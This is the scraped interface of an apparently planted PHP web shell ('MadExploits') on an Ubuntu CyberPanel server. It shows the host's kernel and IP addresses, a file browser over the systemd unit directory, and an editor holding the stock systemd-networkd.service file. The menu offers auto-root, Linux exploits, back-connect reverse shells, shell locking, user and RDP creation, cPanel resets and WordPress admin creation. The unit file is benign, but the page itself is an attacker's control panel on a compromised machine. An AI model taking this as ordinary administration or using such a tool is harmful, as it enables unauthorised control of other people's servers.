Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
ModemManager.service
515
B
-rw-r--r--
console-setup.service
312
B
-rw-r--r--
cron.service
319
B
-rw-r--r--
dmesg.service
409
B
-rw-r--r--
dovecot.service
902
B
-rw-r--r--
e2scrub_reap.service
553
B
-rw-r--r--
fastapi_ssh_server.service
400
B
-rw-r--r--
firewalld.service
616
B
-rw-r--r--
grub-common.service
583
B
-rw-r--r--
grub-initrd-fallback.service
408
B
-rw-r--r--
inetd.service
331
B
-rw-r--r--
irqbalance.service
505
B
-rw-r--r--
lshttpd.service
653
B
-rw-r--r--
lxd-agent.service
476
B
-rw-r--r--
mariadb.service
5.77
KB
-rw-r--r--
networkd-dispatcher.service
258
B
-rw-r--r--
networking.service
643
B
-rw-r--r--
nghttpx.service
328
B
-rw-r--r--
open-vm-tools.service
489
B
-rw-r--r--
opendkim.service
431
B
-rw-r--r--
pdns.service
1.35
KB
-rw-r--r--
pollinate.service
404
B
-rw-r--r--
postfix.service
282
B
-rw-r--r--
redis-server.service
1.17
KB
-rw-r--r--
remote-fs.target
530
B
-rw-r--r--
rsyslog.service
469
B
-rw-r--r--
secureboot-db.service
735
B
-rw-r--r--
snap-core20-2682.mount
326
B
-rw-r--r--
snap-core20-2686.mount
326
B
-rw-r--r--
snap-lxd-36558.mount
320
B
-rw-r--r--
snap-lxd-36918.mount
320
B
-rw-r--r--
snap-snapd-25577.mount
326
B
-rw-r--r--
snap-snapd-25935.mount
326
B
-rw-r--r--
snap.lxd.activate.service
467
B
-rw-r--r--
snapd.apparmor.service
1.27
KB
-rw-r--r--
snapd.autoimport.service
487
B
-rw-r--r--
snapd.core-fixup.service
369
B
-rw-r--r--
snapd.recovery-chooser-trigger...
550
B
-rw-r--r--
snapd.seeded.service
308
B
-rw-r--r--
snapd.service
769
B
-rw-r--r--
ssh.service
538
B
-rw-r--r--
systemd-networkd.service
2.27
KB
-rw-r--r--
thermald.service
309
B
-rw-r--r--
ua-reboot-cmds.service
903
B
-rw-r--r--
ubuntu-advantage.service
1.57
KB
-rw-r--r--
unattended-upgrades.service
377
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-networkd.service
# SPDX-License-Identifier: LGPL-2.1-or-later # # This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Network Configuration Documentation=man:systemd-networkd.service(8) ConditionCapability=CAP_NET_ADMIN DefaultDependencies=no # systemd-udevd.service can be dropped once tuntap is moved to netlink After=systemd-networkd.socket systemd-udevd.service network-pre.target systemd-sysusers.service systemd-sysctl.service Before=network.target multi-user.target shutdown.target Conflicts=shutdown.target Wants=systemd-networkd.socket network.target [Service] AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW BusName=org.freedesktop.network1 CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW DeviceAllow=char-* rw ExecStart=!!/lib/systemd/systemd-networkd ExecReload=networkctl reload LockPersonality=yes MemoryDenyWriteExecute=yes NoNewPrivileges=yes ProtectProc=invisible ProtectClock=yes ProtectControlGroups=yes ProtectHome=yes ProtectKernelLogs=yes ProtectKernelModules=yes ProtectSystem=strict Restart=on-failure RestartKillSignal=SIGUSR2 RestartSec=0 RestrictAddressFamilies=AF_UNIX AF_NETLINK AF_INET AF_INET6 AF_PACKET AF_ALG RestrictNamespaces=yes RestrictRealtime=yes RestrictSUIDSGID=yes RuntimeDirectory=systemd/netif RuntimeDirectoryPreserve=yes SystemCallArchitectures=native SystemCallErrorNumber=EPERM SystemCallFilter=@system-service Type=notify User=systemd-network WatchdogSec=3min [Install] WantedBy=multi-user.target Also=systemd-networkd.socket Alias=dbus-org.freedesktop.network1.service # The output from this generator is used by udevd and networkd. Enable it by # default when enabling systemd-networkd.service. Also=systemd-network-generator.service # We want to enable systemd-networkd-wait-online.service whenever this service # is enabled. systemd-networkd-wait-online.service has # WantedBy=network-online.target, so enabling it only has an effect if # network-online.target itself is enabled or pulled in by some other unit. Also=systemd-networkd-wait-online.service
Close